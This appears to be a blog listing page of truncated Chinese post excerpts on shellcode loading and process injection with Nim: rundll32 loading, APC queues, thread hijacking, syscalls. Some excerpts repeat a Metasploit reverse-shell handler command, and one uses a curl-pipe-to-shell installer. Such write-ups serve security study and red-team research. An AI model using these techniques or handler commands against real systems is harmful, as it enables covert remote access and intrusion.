摘要:
# 白名单 rundll32 加载 shellcode 上线 metasploit 监听 metasploit ``` msfconsole -x "use exploits/multi/handler; set lhost 192.168.0.101; set lport 443; set pay 阅读全文
摘要:
# nim 内联汇编加载 shellcode ## GCC 汇编语法 Linux上的 GNU C 编译器 GCC ,使用 AT&T / UNIX 汇编语法,AT&T 语法和 Intel 语法的差别很大。现在我们看到了 Intel 语法和 AT&T 语法之间的一些主要差别。我仅仅写了它们差别的一部分而 阅读全文
摘要:
# Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert ## APC队列 异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队 阅读全文
摘要:
# Injecting to Remote Process via Thread Hijacking ## metasploit 监听 metasplit ``` msfconsole -x "use exploits/multi/handler; set lhost 192.168.0.101; 阅读全文
摘要:
首先通过CreateEvent函数创建一个signaled的事件对象,也就是第三个参数必须为TRUE。否则shellcode将不会得到执行,且进程将一直等待下去。 使用CreateThreadpoolWait函数创建一个线程池等待回调,我们只需要关心第一个参数也就是等待完成或者超时后要执行的回调函数 阅读全文
摘要:
某日在一台windows 7 上安装nim lang,然后安装第一个包就报错了。 C:\Users\user>nimble install winim --verbose Reading official package list Downloading https://github.com/khc 阅读全文
摘要:
某日尝试编译一个文件,报错如下。 Error: cannot open file: winim/lean 根据错误消息,需要安装“winim”,但是安装失败如下所示。 cmdshell> nimble install winim --verbose Reading official package 阅读全文
摘要:
# nim 创建 dll 编译命令 ``` nim c --app:lib --nomain:on test.nim ``` “--app:lib”表示生成动态链接库(dll)。 “--nomain:on”表示不生成 dllmain 函数。 ## 源代码 test() 是我们自定义的导出函数。 `` 阅读全文
摘要:
1 #[ 2 https://gist.github.com/treeform/782149b5fc938753feacfca43637aa90 3 License: BSD 3-Clause 4 ]# 5 import winim, pixie 6 import winim/inc/windef 阅读全文
摘要:
Shellcode Injection using Nim and Syscalls(nim学习系列) kali 安装 nim lang环境 安装nim lang: curl https://nim-lang.org/choosenim/init.sh -sSf | sh 安装mingw-w64: 阅读全文